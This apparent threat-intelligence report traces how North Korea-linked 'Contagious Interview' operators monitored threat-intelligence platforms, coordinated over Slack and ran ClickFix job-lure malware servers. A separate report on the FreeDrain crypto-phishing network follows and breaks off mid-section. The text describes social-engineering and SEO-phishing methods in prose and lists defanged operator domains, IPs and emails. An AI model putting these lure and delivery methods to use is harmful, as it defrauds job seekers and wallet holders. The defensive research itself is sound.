Executive Summary

• North Korea-aligned threat actors actively monitor cyber threat intelligence to detect infrastructure exposure and scout for new assets. This analysis focuses on the abuse of cyber intelligence platforms by the actors behind the Contagious Interview campaign cluster employing the ClickFix social engineering technique.
• They operate in coordinated teams with real-time collaboration, likely using Slack and multiple intelligence sources such as Validin, VirusTotal, and Maltrail.
• Although aware their infrastructure is detectable, they make only limited changes to reduce detection and disruption risk, while rapidly deploying new infrastructure in response to service provider takedowns.
• This indicates a strategic focus on continuously replacing disrupted infrastructure with new assets to sustain operations and high victim engagement.
• Factors such as decentralized command and competitive internal incentives may limit the threat actors’ ability to consistently protect existing infrastructure at scale.
• SentinelLABS’ analysis suggests that the threat actors are effective at engaging targets; there were over 230 victims between January and March 2025, with the actual number likely being significantly higher.
• In partnership with SentinelLABS and Validin, Reuters provides further coverage of the human dimension of this threat, exploring victim engagement methods and their personal impact.

Overview

In collaboration with the internet intelligence platform Validin, SentinelLABS has been tracking activity on the platform which we attribute with high confidence to North Korean threat actors involved in the Contagious Interview campaign cluster. This activity, which took place between March and June 2025, involved the threat actors examining cyber threat intelligence (CTI) information related to their infrastructure. Our unique visibility has provided valuable insights into their operational practices, internal coordination, infrastructure management and deployment, and victimology.

SentinelLABS continuously tracks North Korean-aligned threat actors, including their persistent interest in cyber threat intelligence. As part of SentinelLABS’ broader efforts to identify and disrupt North Korean operations in collaboration with partner organizations, SentinelLABS and Validin conducted a joint investigation, combining our threat intelligence expertise with Validin’s visibility into the threat actors’ activities on their platform, to better understand these activities and provide actionable intelligence supporting defensive actions.

SentinelLABS and Validin observed an intensive and coordinated effort by Contagious Interview threat actors to register and use Validin community access accounts within approximately 24 hours after Validin published a blog post on 11 March 2025. The post discusses the infrastructure of Lazarus, a suspected North Korean APT umbrella cluster associated with Contagious Interview activities. Validin’s community access portal provides free access to infrastructure intelligence information.

The threat actors used Google Gmail addresses that we had already been tracking as Contagious Interview artifacts at the time of registration. Although Validin blocked the accounts shortly after registration, we observed the threat actors persisting in their efforts to use Validin by creating accounts at later dates. At that point, we intentionally kept one account active over the long term to monitor and gather intelligence on their activities.

We observed that the Contagious Interview threat actors engaged in coordinated activity and likely operated in teams to investigate threat intelligence related to their infrastructure and to monitor for signs of detection. Indicators suggest they used multiple indicators of compromise (IOC) repositories and CTI platforms, including Validin, VirusTotal, and Maltrail. We also identified indicators of real-time teamwork, including possible use of the Slack platform to coordinate their investigations.

Despite thoroughly examining threat intelligence and identifying artifacts that can be used to discover their infrastructure, the threat actors did not implement systematic, large-scale changes to make it harder to detect, thereby reducing its exposure to discovery and disruption. Instead, we observed only sporadic, limited-scale changes targeting specific artifacts used to identify Contagious Interview infrastructure, while the threat actors rapidly deployed new infrastructure in response to service provider takedowns.

This may reflect a focus on investing resources to maintain operational readiness and sustain the campaign’s high volume of victim engagement by deploying new infrastructure rather than undertaking broad modifications to protect existing infrastructure. Based on log files unintentionally exposed on several Contagious Interview servers, we identified over 230 individuals affected during the period from January to March 2025, though the actual number is likely much higher.

Given the continuous success of their campaigns in engaging targets, it may be more pragmatic and efficient for the threat actors to deploy new infrastructure rather than maintain existing assets. Potential internal factors, such as decentralized command structures or operational resource constraints, may restrict their capacity to rapidly implement coordinated changes. Moreover, competitive pressures stemming from North Korea’s annual revenue quotas for cyber teams likely incentivize operatives to make isolated adjustments to the infrastructure under their control in order to protect their own assets and outperform colleagues, rather than participate in centrally coordinated, large-scale updates.

The threat actors also used Validin to scout and evaluate new infrastructure before acquisition, likely aiming to avoid assets previously flagged as malicious, which would increase detection risk and reduce operational effectiveness once deployed. Following acquisition, they continued to monitor their assets for signs of detection throughout their lifecycle. We were closely monitoring Contagious Interview infrastructure during its acquisition and deployment, which revealed repeated OPSEC failures, suggesting a lack of consistent operational security controls during the infrastructure setup phase.

Background | Contagious Interview and ClickFix

First used in 2023 to label a campaign targeting job seekers, the term Contagious Interview has since been used interchangeably in other contexts, including to refer to an APT group assessed to be a subset of the North Korean umbrella group Lazarus.

In this post, we use Contagious Interview to refer to a cluster of campaigns, variants of the 2023 campaign, that target job applicants using diverse social engineering tactics to trick targets into executing malware.

Contagious Interview activities predominantly target individuals active in the cryptocurrency industry, aiming to gain access to their systems for various purposes, including intelligence collection and the theft of cryptocurrency assets. This supports North Korea’s efforts in evading sanctions and generating illicit revenue for financing its projects, including missile programmes.

Contagious Interview campaigns have been typically associated with the umbrella threat cluster Lazarus. DTEX Systems has attributed these campaigns to a group referred to as Gwisin Gang, which likely emerged from an IT organization whose subordination within the North Korean state apparatus is still subject to assessment.

Recent Contagious Interview campaigns, also referred to as ClickFake Interview, involve a social engineering technique known as ClickFix. We assess that the threat actors whose activities are discussed in this post are involved in these campaigns.

ClickFix typically proceeds as follows. A targeted job seeker receives an invitation to participate in a job application process, directing them to a lure website where they are prompted to complete a skill assessment. During the assessment, the applicant encounters a fabricated error message, such as a camera access issue. They are then instructed to copy and paste command lines, often involving utilities like curl, to download and execute a supposed update from a separate malware distribution server, unknowingly deploying malware in the process. This technique is discussed in more detail in previous research.

Account Registrations | Initial Activities

The threat actors started creating Validin community accounts on 12 March 2025 at 22:44:11 UTC, an activity which spanned a relatively short interval of approximately 15 minutes, suggesting a concentrated and coordinated approach. We present below the email addresses used for account registrations as well as the IP addresses from which the registrations were conducted. We attribute this activity to Contagious Interview threat actors based on multiple indicators.

A significant portion of the IP addresses used for registration, such as 194.33.45[.]162, 70.39.70[.]194, 70.32.3[.]15, 38.170.181[.]10, and 45.86.208[.]162, have been associated with Astrill VPN, a VPN service popular among North Korean threat clusters.

Additionally, even before the account registrations, SentinelLABS and Validin were already tracking the email addresses fairdev610[@]gmail.com, richardkdavis45[@]gmail.com, rockstar96054[@]gmail.com, excellentreporter321[@]gmail.com, and hundredup2023[@]gmail.com as Contagious Interview artifacts. We found these addresses in unintentionally exposed JavaScript scripts (Node.js applications) on Contagious Interview ClickFix malware distribution servers.

We have been tracking these Node.js applications under the ContagiousDrop moniker since their initial exposure. Typically implemented as app.js files, the applications distribute malware to targeted individuals and notify the threat actors via email about victim engagement. This engagement includes information submission to Contagious Interview lure websites and the execution of commands, such as curl, as directed by the threat actors as part of the ClickFix social engineering tactic. A ContagiousDrop sample is highlighted in previous research on Contagious Interview activity published in April 2025. These applications will be discussed in greater detail later in this blog post.

Moreover, some email addresses have been used for registering Contagious Interview domains pointing to lure websites. For example, marvel714jm[@]gmail.com and jimmr6587[@]gmail.com have been used to register the paxos-video-interview[.]com and skill-share[.]org domains, respectively.

Finally, some email addresses were used to register Validin accounts from IP addresses that were also used to register or log in to accounts with other email addresses we attribute with high confidence to Contagious Interview. For example, the account montessantiago9712[@]gmail.com was registered from the IP address 38.170.181[.]10, the same as jimmr6587[@]gmail.com.

Approximately 15 minutes after the first observed account registration, Validin blocked the Contagious Interview accounts and subsequently prevented further community registrations originating from known Astrill VPN IP addresses or using Gmail accounts.

Account Registrations | Further Activities

After likely realizing that their access to Validin had been blocked, Contagious Interview threat actors attempted to register community accounts again on 25 March 2025 (13 days after the initial registration activity) and 26 April 2025. This time, they also used non-Gmail email addresses, most likely in response to Validin blocking Gmail-based registrations: info[@]versusx[.]us and invite[@]quiz-nest[.]com. We present below the email addresses used for Validin account registrations, along with the date, time, and originating IP addresses of these registrations.

The domain registration records for versusx[.]us include the email address brooksliam534[@]gmail.com, which has also been used to register several Contagious Interview domains discussed in previous research, such as willotalent[.]us and nvidia-release[.]us. Additionally, indicators suggest that the brooksliam534[@]gmail.com account has been involved in publishing malicious npm (Node Package Manager) packages (cors-app and cors-parser) as part of a software supply chain campaign attributed to Contagious Interview threat actors.

We observed the registration of invite[@]quiz-nest[.]com approximately two minutes after the threat actors attempted to register mvsolution9[@]gmail.com. The registration of mvsolution9[@]gmail.com failed due to measures Validin implemented following the March 2025 account registration activities. Both actions originated from the same IP address, 181.215.9[.]29, suggesting the involvement of a single operator.

mvsolution9[@]gmail.com has been used to register two Contagious Interview domains: evalassesso[.]com, which Sekoia has also attributed to Contagious Interview, and speakure[.]com. The quiz-nest[.]com website, at least up to 24 May 2025, was implemented in a manner typical of Contagious Interview lure websites.

We also observed login attempts on 9 May 2025 using the excellentreporter321[@]gmail.com and marvel714jm[@]gmail.com accounts, which had been blocked by Validin in March 2025.

The threat actors’ shift to using non-Gmail addresses, along with their continuous attempts to bypass Validin’s access controls, highlights their adaptability and persistent interest in Validin data. Recognizing their persistence in obtaining community access, we intentionally kept only the info[@]versusx[.]us account active to monitor subsequent activity, determine their objectives, and gather further intelligence. Since then, the Contagious Interview threat actors have continued attempting to register new Validin accounts through the time of writing this post.

Account Registrations | Personas

In accordance with Validin’s policy for community accounts, the Contagious Interview actors completed registration forms requesting information such as full name, affiliation, and reason for registration.

The threat actors used a diverse range of names, from generic handles like jimmr to pop-culture references such as Rock Lee (a character from the Japanese anime series Naruto), Mar Vel (likely referring to Mar-Vell, a Captain Marvel character from Marvel Comics), and Santiago Montes (the main protagonist of the animated television series Santiago of the Seas), as well as more elaborate, seemingly legitimate full names like Andress Victor Pabon Carrascal. The reuse of the name Anika Larkin for two different accounts, invite[@]quiz-nest[.]com and mvsolution9[@]gmail.com, combined with both accounts being registered from the same IP address (181.215.9[.]29) within approximately two minutes, suggests the involvement of a single individual.

Some affiliations correspond to fake hiring platforms operated by Contagious Interview. For example, Quiz Nest aligns with the domain quiz-nest[.]com, while Paxos corresponds to domains such as paxos-video-interview[.]com and paxosassessments[.]com. The account marvel714jm[@]gmail.com, which used the Paxos affiliation, was also used to register the domain paxos-video-interview[.]com. This suggests the actors leveraged their own infrastructure and fabricated brands to create a more convincing facade of legitimacy.

In addition to these fake platforms, the threat actors also used names of legitimate, well-known companies such as Starlink, as well as vague descriptors like Individual or Personal.

Some of the stated reasons for registration provide direct insight into the threat actors’ primary objective: investigating threat intelligence information related to their infrastructure. For example, pretexts such as Research,  To find domain, and Find My Platform indicate their interest in exploring Validin’s data.

Validin Use | Activity Across Multiple Platforms

The majority of accounts began using the Validin platform immediately after registration. In total, we observed 57 unique search terms across all categories supported by the platform, including domain names, hashes, URLs, web metadata, keywords, and IP addresses.

The threat actors did not search for any IOCs reported in Validin’s blog post, which we suspect triggered their initial interest in the platform. Therefore, we assess the post only brought Validin to their attention, after which they integrated Validin into a broader workflow for investigating threat intelligence related to their operations by leveraging multiple sources.

We observed indicators suggesting that the threat actors used additional IOC repositories and platforms alongside Validin to conduct comprehensive investigations. These included VirusTotal and the apt_lazarus.txt file, which is part of the Maltrail project and publicly available on GitHub. This file is regularly updated with domain names, IP addresses, and URLs attributed to the Lazarus umbrella APT cluster, as well as sources providing attribution information or context, such as social media, blog posts, and other threat intelligence platforms (including VirusTotal and Validin). VirusTotal is a malware analysis service and threat intelligence platform that aggregates detection results, reputation assessments, and contextual information for files, URLs, domains, and IP addresses from a wide range of detection engines, third-party tools, and its user community.

The very first search term used by the threat actors was the keyword TalentCheck, entered on 12 March 2025 at 22:44:40 UTC. TalentCheck is the title of multiple Contagious Interview websites, including skillcheck[.]pro, talentcheck[.]pro, and vidassesspro[.]com. The keyword was first published as an artifact identifying Contagious Interview websites approximately one day earlier by Maltrail in apt_lazarus.txt, on 11 March 2025 at 11:18:22 UTC. This suggests that the threat actors likely used Validin to investigate what additional information the platform could provide based on the TalentCheck keyword they first observed in apt_lazarus.txt.

Most of the search terms the threat actors used in Validin had been published exclusively in apt_lazarus.txt at the time of the search and were queried shortly after their appearance in the file, sometimes within less than an hour. This supports our assessment that the Contagious Interview actors closely monitored apt_lazarus.txt and used Validin to gather further details and contextual information.

In addition to Maltrail, we suspect that the Contagious Interview threat actors also use VirusTotal, or monitor what information about their infrastructure and malware is available on the platform, in conjunction with Validin. For example, the account richardkdavis45[@]gmail.com queried Validin for the URL https[://]robinhood[.]evalvidz[.]com/invite/fZ6j8A2k on 12 March 2025 at 22:59:20 UTC, just a few minutes after the exact same URL was first submitted to VirusTotal at 22:54:24 UTC.

Based on log files, we were able to reconstruct the exact navigation paths of the Contagious Interview threat actors within Validin. We observed a strong interest in external references that provide attribution information for specific search terms, which Validin displays in the Reputation Factors panel on the search results page. For most of the domains they searched, the threat actors visited every available external reference, demonstrating a determined effort to conduct thorough CTI investigations by gathering information from multiple sources.

Validin Use | Team Collaboration

We observed multiple accounts searching for the same terms within a very short time frame, indicating a coordinated and collaborative effort involving multiple individuals. In addition, we identified strong indicators that the threat actors were using Slack, a messaging platform commonly used for team communication and collaboration, to coordinate their activities.

When investigating patterns of account activity and search behavior using Validin log data, we observed that the jimmr6587[@]gmail.com account was the first to search for the domain webcamfixer[.]online on 12 March 2025 at 22:54:19 UTC, followed by excellentreporter321[@]gmail.com (22:55:17 UTC), rockstar96054[@]gmail.com (22:55:25 UTC), richardkdavis45[@]gmail.com (22:55:43 UTC), and fairdev610[@]gmail.com (22:55:55 UTC).

Our cross-examination of web server log data revealed that the search by jimmr6587[@]gmail.com was followed by requests to Validin from Slack Robots for the same URL generated by the search (/detail?type=dom&find=webcamfixer[.]online). Slack Robots retrieve web content when a user posts a URL in a channel or direct message, displaying summary information such as the page title, meta description, and a preview image.

These Slack Bot requests were followed by requests to the same URL from the IP addresses from which the accounts excellentreporter321[@]gmail.com, rockstar96054[@]gmail.com, richardkdavis45[@]gmail.com, and fairdev610[@]gmail.com had logged in. The timing of these requests aligns with each account’s respective search for webcamfixer[.]online as recorded in Validin logs.

This suggests that the individual operating the jimmr6587[@]gmail.com account searched for webcamfixer[.]online in Validin, pasted the resulting URL into Slack, and that the individuals behind the other accounts subsequently clicked on the shared link in quick succession.

Validin Use | Limited Infrastructure Changes

Despite thoroughly investigating CTI information and identifying artifacts that could be used to discover their infrastructure, we did not observe any systematic or widespread actions by the Contagious Interview threat actors to make their infrastructure more difficult to discover and to protect it against detection and disruption. We observed only sporadic changes of limited scale that did not significantly reduce the infrastructure’s visibility to defenders and threat researchers.

For example, after searching in Validin for the keyword SkillMaster, which is the title of multiple Contagious Interview websites, the threat actors changed the title of only one site, skillmasteryhub[.]us, from SkillMaster to SkillUp a few hours after the search. This change was not applied to other websites with the same title, such as VidHireHub[.]com.

Many of the Contagious Interview domains that the threat actors searched for in Validin were taken down by their respective registrars shortly after the search activity. Some may have been voluntarily deactivated by the threat actors themselves, likely to avoid seizure or further investigation, particularly if the domains were linked to their operational security. For example, the A DNS record for the domain careerquestion[.]com was removed just a few hours after the threat actors searched for it in Validin and confirmed its association with their operation.

The lack of systematic changes to their infrastructure, despite the threat actors’ thorough examination of CTI information, suggests several possible explanations.

Given the continuous success of the campaign in engaging job applicants, the threat actors may be prioritizing maintaining operational readiness and meeting their objectives by rapidly deploying new assets to replace disrupted infrastructure, rather than undertaking large-scale targeted changes. We observed a high rate of new infrastructure deployment by the Contagious Interview threat actors alongside losses of existing infrastructure due to actions by service providers, which supports this assessment.

There may be internal limitations, such as a lack of a central authoritative command structure or resource constraints affecting their ability to modify infrastructure rapidly and at scale. Additionally, the North Korean regime sets annual earnings quotas for cyber teams, requiring them to self-fund while meeting revenue targets. These quotas likely incentivize operatives to continually seek new income sources, fostering intense competition within teams. As a result, individuals managing only portions of the Contagious Interview infrastructure may make limited changes aimed at evading detection of the infrastructure they oversee, thereby gaining advantages over colleagues, rather than engaging in coordinated, large-scale modifications.

Validin Use | New Infrastructure And OPSEC Failures

The activity patterns of the info@versusx[.]us account on Validin, which we intentionally kept active over the long term, suggest that the threat actors used the platform not only to monitor for signs of detection related to their existing infrastructure, but also:

• To scout and evaluate new infrastructure prior to purchase, highly likely to determine whether it had been previously reported as malicious. This helps the threat actors avoid acquiring assets already labeled as malicious, which would increase the risk of detection and reduce the effectiveness of their operations once deployed.
• To monitor newly acquired infrastructure throughout its lifecycle for any indicators of detection.

For instance, on March 25, 2025, we observed the info@versusx[.]us account searching for the domain names hiringassessment[.]net, hiringassessment[.]com, hireassessment[.]com, easyjobinterview[.]org, and screenquestion[.]org. All of these domains were available for purchase at the time. These names align with the recruitment-related themes typically used in Contagious Interview activities.

The info@versusx[.]us account also searched for multiple domains shortly after they were purchased and continued monitoring them for signs of detection after deploying web content. One example is skillquestions[.]com, which was first queried on March 25, 2025, at 17:33:34 UTC, just minutes before it was registered at 17:41:14 UTC. Additional searches occurred shortly before content was deployed on April 23, 2025, and continued periodically until May 6, 2025. According to Validin data, the skillquestions[.]com website remained operational until at least May 13, 2025, at 20:44:27 UTC.

Our continuous monitoring of the planning, acquisition, and deployment of new Contagious Interview infrastructure allowed us to identify OPSEC mistakes made by the threat actors throughout the process. We observed multiple instances of such errors, including the unintended exposure of files and directory contents, which indicate poor OPSEC practices during infrastructure deployment and provide further insight into their operations.

For example, api.release-drivers[.]online was exposing its web root directory, the files it contained, and their associated modification timestamps. This included error logs from a Node.js application stored in /home/relefmwz/api.release-drivers[.]online/, indicating that the threat actors used the username relefmwz. The exposed timestamps provide insight into when the Contagious Interview operators deployed content to the server, allowing us to reconstruct their activity timeline.

Further, several newly deployed ClickFix malware distribution servers, such as api.camdriverhelp[.]club and api.drive-release[.]cloud, were exposing ContagiousDrop applications along with the log files they had generated. These files contain information on affected individuals, allowing us to gain valuable insights into the victimology of the campaigns.

ContagiousDrop Applications

The ContagiousDrop applications, typically implemented in app.js files, are deployed on ClickFix malware distribution servers such as api.drive-release[.]cloud. These applications run servers that listen on configured ports to handle incoming HTTP GET and POST requests, executing different functions based on the specific request path.

The ContagiousDrop applications deliver malware disguised as software updates or essential utilities. They distribute a tailored payload based on the victim’s operating system (Windows, macOS, or Linux), system architecture, and method of interaction with the server, such as the use of the curl command.

In addition to delivering malware, the ContagiousDrop applications feature an integrated email notification system. These notifications, sent from a configured email address such as designedcuratedamy58[@]gmail.com, provide the Contagious Interview threat actors with insights into victim engagement and interaction patterns and are delivered to their configured recipient addresses. For example, an email is triggered when an affected individual starts a fake skill assessment or executes a curl command to download a file from the ClickFix malware distribution server.

Furthermore, these applications record victim information across multiple files and interaction points, effectively building a victimology database and logging victim activities. For example, initial and later engagements are captured in client_ips_start_test.json and client_ips_submit.json, including details such as full name, email address, IP address, phone number, and the date of interaction. Malware download initiations are logged in files such as client_ips_start.json and client_ips_mac_start.json, which capture operating system–specific payload delivery.

ContagiousDrop | Victimology

Based on ContagiousDrop log files we retrieved, we identified over 230 individuals who engaged with Contagious Interview lures between mid-January and the end of March 2025. This figure is based on log files from only a few Contagious Interview servers; therefore, the actual number of affected individuals is likely significantly higher. Their engagement spanned multiple stages of the attack, including completing fake assessment tests and progressing to the infection phase via the ClickFix technique.

Most of the affected individuals work in roles related to cryptocurrency and blockchain technologies, primarily within the marketing and finance sectors, and are geographically distributed worldwide. They engaged with lures involving various job positions, such as Portfolio Manager, Investment Manager, and Senior Product Manager, across a range of impersonated companies including Archblock, Robinhood, and eToro.

In addition to entries related to victim activity, the ContagiousDrop logs also contain records likely generated during testing of lure deployment and campaign infrastructure by the Contagious Interview threat actors themselves. They used email addresses and persona names we have associated with them, such as awesomium430[@]gmail.com (found in ContagiousDrop code) and Richard Davis. Other names, such as test, test user, and Lazaro, indicate internal testing activity, with Lazaro likely being derived from the name of the North Korean umbrella threat cluster associated with Contagious Interview activities: Lazarus.

Conclusions

North Korean threat groups actively examine CTI information to identify threats to their operations and improve the resilience and effectiveness of their campaigns, depending on their operational priorities. In addition to the actors behind the Contagious Interview campaign cluster, SentinelLABS has also observed other North Korean groups demonstrating interest in threat intelligence prior to the activities discussed in this post. In 2024, we retrieved malware associated with ScarCruft, likely designed to target consumers of threat intelligence reporting, such as threat researchers and other cybersecurity professionals. We suspect the actors aimed to gain insights into non-public CTI and defensive strategies.

In this post, we disclose indicators and TTPs that enable the sustained tracking of the Contagious Interview threat actors. While we expect them to alter their methods as a result, the expanding scale and broad targeting of these operations suggests greater benefit in empowering the wider public to effectively defend than there is in hoarding actionable intelligence indefinitely. SentinelLABS maintains other methods of tracking these evolving campaigns.

Based on our observations, the Contagious Interview threat actors do not implement systematic changes to their infrastructure based on the CTI information they consume from multiple sources, which could make their operations harder to detect or disrupt. Despite this, they continue to achieve a relatively high success rate in attracting job seekers through fraudulent employment offers and skill assessment tests. Their operational strategy appears to prioritize promptly replacing infrastructure lost due to takedown efforts by service providers, using newly provisioned infrastructure to sustain their activity.

Therefore, a critical element in mitigating this threat is the human factor. It is important that job seekers, particularly those within the cryptocurrency sector, exercise heightened vigilance when engaging with employment offers and associated assessments.

In addition, infrastructure service providers play an important role in disrupting Contagious Interview operations. Continuous and effective actions against the threat actors’ infrastructure can significantly reduce their capacity to carry out attacks. Close collaboration and coordination between service providers and the threat intelligence community are crucial to mitigating the impact of these activities. SentinelLABS and Validin remain committed to sharing timely and actionable threat intelligence to support these collaborative efforts.

Indicators of Compromise

Email Addresses (Contagious Interview Operators)

 
IP Addresses

Contagious Interview Domains

 
ClickFix Malware Distribution Servers

 
Domains Scouted by Contagious Interview Operators

SHA-1 Hashes

Executive Summary

• FreeDrain is an industrial-scale, global cryptocurrency phishing operation that has been stealing digital assets for years.
• FreeDrain uses SEO manipulation, free-tier web services (like gitbook.io, webflow.io, and github.io), and layered redirection techniques to target cryptocurrency wallets.
• Victims search for wallet-related queries, click on high-ranking malicious results, land on lure pages, and are redirected to phishing pages that steal their seed phrases.
• SentinelLABS and Validin researchers identified over 38,000 distinct FreeDrain subdomains hosting lure pages.
• Phishing pages are hosted on cloud infrastructure like Amazon S3 and Azure Web Apps, mimicking legitimate cryptocurrency wallet interfaces.
• Evidence suggests the operators are based in the UTC+05:30 timezone (Indian Standard Time) and work standard weekday hours.
• FreeDrain represents a modern, scalable phishing operation that exploits weaknesses in free publishing platforms and requires better platform-level defenses, user education, and security community collaboration.

Unveiled today at PIVOTcon, this joint research from Validin, the global internet intelligence platform, and SentinelLABS, the threat intelligence and research team of SentinelOne, exposes the FreeDrain Network: a sprawling, industrial-scale cryptocurrency phishing operation that has quietly siphoned digital assets for years. What began as an investigation into a single phishing page quickly uncovered a vast, coordinated campaign weaponizing search engine optimization, free-tier web services, and layered redirection techniques to systematically target and drain cryptocurrency wallets at scale.

In this collaborative blog, we detail the technical anatomy of the FreeDrain operation from the discovery process and infrastructure mapping to evasion techniques and the end-to-end workflow attackers use to funnel victims through multilayered financial theft paths. We also walk through the custom tooling we built to hunt, track, and monitor this large campaign in real time.

Our findings highlight the growing sophistication of financially motivated threat actors and the systemic risks posed by under-moderated publishing platforms. This research underscores the need for adaptive detection, proactive monitoring, and tighter safeguards across the ecosystem to disrupt threats like FreeDrain before they scale.

The Plea for Help

Our investigation into what would become the FreeDrain Network began on May 12, 2024, when Validin received a message from a distressed individual who had lost approximately 8 BTC, worth around $500,000 at the time. The victim had unknowingly submitted their wallet seed phrase to a phishing site while attempting to check their wallet balance, after clicking on a highly-ranked search engine result.

The individual had come across a Validin blog post from April 2024, which documented a series of crypto-draining phishing pages. The phishing site they encountered shared striking similarities to the infrastructure we had analyzed—specifically, pages hosted on azurewebsites[.]net, along with additional dedicated domain names.

Trusted cryptocurrency tracking analysts confirmed that the destination wallet used to receive the victim’s funds was a one-time-use address. The stolen assets were quickly moved through a cryptocurrency mixer, an obfuscation method that fragments and launders funds across multiple transactions, making attribution and recovery nearly impossible.

While we weren’t able to assist in recovering the lost assets, this outreach marked a turning point. It became clear that the incident was not isolated. We set out to uncover the infrastructure behind the scam and understand the broader operation enabling these thefts to occur at scale.

Cracking the Surface – Our First Look at FreeDrain

When Valdin published the initial findings in April 2024, one key piece of the puzzle remained unclear: how were these phishing pages reaching victims at scale? While common delivery methods like phishing emails, SMS (smishing), social media posts, and blog comment spam are frequently used in cryptocurrency scams, none appeared to be the source in this case.

That changed with the report from the victim in May. They had encountered the phishing site via a top-ranked search engine result, not a suspicious message or unsolicited link.

Curious whether we could reproduce the victim’s experience, we conducted a series of keyword searches ourselves. The results were startling.

Search terms like “Trezor wallet balance” returned multiple malicious results across Google, Bing, and DuckDuckGo, often within the first few result pages.

These were not obscure or poorly maintained phishing sites; they were professionally crafted lure pages freely hosted on subdomains of trusted platforms like gitbook.io, webflow.io, and github.io.

This discovery marked our first real glimpse into the scale and sophistication of the FreeDrain campaign—and raised a host of new questions. Specifically, what is the overall workflow once a victim visits the site, how are these pages becoming so highly ranked, and what can we discover about the attackers themselves?

Workflow – A Victim’s Path to Compromise

To understand how victims were being funneled into this operation and the post-visit workflow, we checked out the top-ranked search results that we knew weren’t connected to authoritative, legitimate websites, looking for malicious behavior. Within minutes, we encountered related live phishing pages, and quickly began piecing together the end-to-end workflow that a typical victim might experience.

The attack chain was deceptively simple:

1. Search for wallet-related queries (e.g., “Trezor wallet balance”) on a major search engine.
2. Click a high-ranking result, often hosted on a seemingly trustworthy platform like gitbook.io or webflow.io.
3. Land on a page displaying a large, clickable image, a static screenshot of the legitimate wallet interface.
4. Click the image, which either:
   • Redirects the user to legitimate websites.
   • Redirects the user through one or more intermediary sites
   • Directly leads to a phishing page.
5. Arrive at the final phishing site, a near-perfect clone of the real wallet service, prompting the user to input their seed phrase.

The entire flow is frictionless by design, blending SEO manipulation, familiar visual elements, and platform trust to lull victims into a false sense of legitimacy. And once a seed phrase is submitted, the attacker’s automated infrastructure will drain funds within minutes.

Lure Page Ranking – Weaponizing SEO

We were stunned by the sheer volume of lure pages appearing among top-ranked search results across all major search engines. These weren’t complex, multi-layered scams. In most cases, the pages consisted of just a single large image (again, usually a screenshot of a legitimate crypto wallet interface) followed by a few lines of text that offered seemingly helpful instructions, ironically, some even claimed to educate users on how to avoid phishing.

This type of simplistic, Q&A-style content is well-known in SEO circles for being rewarded by search engine algorithms. Because users often turn to search engines for direct answers, pages that appear to offer guidance, even when malicious, can be algorithmically elevated in rankings, especially when hosted on high-reputation platforms.

In our early investigation (May–June 2024), we found that many of these lure pages were hosted on services like webflow.io and gitbook.io. Both platforms provide low-friction publishing, enabling anyone to spin up a custom subdomain and publish arbitrary content for free. The subdomains used followed familiar spammer patterns, frequent use of hyphens, deliberate misspellings, and keyword stuffing to manufacture variation and dodge blacklisting.

Generative AI as a Tool for Scale

The text on many lure pages bore clear signs of having been generated by large language models. We found copy-paste artifacts that revealed the specific tools used, most notably, strings like “4o mini”, a likely reference to OpenAI’s GPT-4o mini model. These telltale traces suggest that FreeDrain operators are leveraging generative AI not only to create scalable content but doing so carelessly at times.

FreeDrain’s Secret Weapon – Spamdexing

But content alone doesn’t explain how these pages were getting indexed and ranked above legitimate sources. How were search engines even discovering them?

The answer came when we identified several indexed URLs pointing back to high-ranking lure pages, and traced them to massive comment spam campaigns. FreeDrain operators appear to be heavily abusing neglected web properties that allow open or weakly-moderated comments, flooding them with links pointing to their lure pages. This old tactic, known as spamdexing, is a well-documented SEO abuse technique, which FreeDrain makes heavy use of as one of the ways to attempt to game SEO.

In one striking example, we found a Korean university photo album page with a single image uploaded over a decade ago, buried under 26,000 comments, nearly all of them containing spam links.

This technique allows FreeDrain to sidestep traditional delivery vectors like phishing emails or malicious ads, instead meeting victims exactly where they’re looking, at the top of trusted search engines.

Tracking Search Results

Understanding how FreeDrain’s lure pages consistently climbed to the top of search results became a key investigative goal, and it demanded custom tooling.

We built a purpose-specific crawler designed solely to emulate search engine queries, navigate through pages of search results, and extract structured data from each result: URLs, page titles, and text content summaries. The goal was to systematically monitor how malicious pages were ranking, shifting, and proliferating over time.

We ran this system daily across 700 unique keyword permutations, capturing up to 40 pages deep per search query, per search engine. This daily monitoring provided a dynamic, longitudinal view into the visibility of FreeDrain’s infrastructure.

The Scale of Abuse

After four months of collection, we amassed a dataset of more than 200,000 unique URLs, drawn from topical search results across at least a dozen different publishing platforms that allow users to create custom subdomains. Aggressively filtering, we identified over 38,000 distinct FreeDrain subdomains hosting the lure pages.

These subdomains appeared on well-known free hosting and publishing platforms, including:

• Gitbook (gitbook.io)
• Webflow (webflow.io)
• Teachable (teachable.com)
• Github.io
• Strikingly (mystrikingly.com)
• WordPress.com
• Weebly.com
• GoDaddySites (godaddysites.com)
• Educator Pages (educatorpages.com)
• Webador (webador.com)

The volume and spread across legitimate platforms further highlights how FreeDrain relies on the low-friction, high-trust nature of these services to evade detection and amplify reach.

To go beyond static discovery, we implemented scheduled re-crawls of every suspected lure page. This allowed us to track:

• Content updates over time
• Changes in redirect behavior
• New final-stage phishing URLs being introduced
• Takedowns and domain churn

This gave us a clearer picture of FreeDrain’s infrastructure lifecycle, from initial lure page creation to eventual takedown or abandonment, which helped us understand the rotation strategies used to keep malicious links live and searchable.

Lure Page Breakdown

Despite being spread across a wide array of publishing platforms, FreeDrain lure pages followed a remarkably consistent structure, carefully optimized to appear helpful and legitimate, while subtly guiding victims toward compromise.

Common Elements Observed Across Lure Pages

Across gitbook.io, webflow.io, github.io, and others, the pages typically included:

• A single, large, clickable image occupying most of the viewport
  • This image was a screenshot of a legitimate cryptocurrency site (e.g., Trezor, Metamask, or Ledger)
  • The image linked externally, usually to a malicious redirection chain
• AI-generated help content positioned below the image
  • The text answered common user queries like “How do I check my wallet balance on Trezor?”
• 1–2 additional embedded links, which pointed to the same external destination as the image or were placeholders like "#"

Link Behavior: Redirection Variability

Clicking the image or associated links triggered unpredictable outcomes, depending on the time, user agent, or page freshness:

• Redirection through one or more intermediary domains (typically 1–5 hops)
• Final destinations varied widely:
  • A phishing page built to capture wallet seed phrases (hosted on Azure or AWS S3)
  • A legitimate site like trezor.io or metamask.io, creating false reassurance
  • A non-functional domain (404 or NXDOMAIN)
  • The current page itself ("#") acting as a placeholder when infrastructure wasn’t active

This redirection behavior made classification challenging, especially since not every page led directly to a phishing endpoint in every instance.We observed that lure pages initially hosted benign content before being modified to include malicious redirects usually weeks or months later. This aging tactic likely helped the sites build trust and survive longer before being flagged or removed.

Obfuscation Through Variation

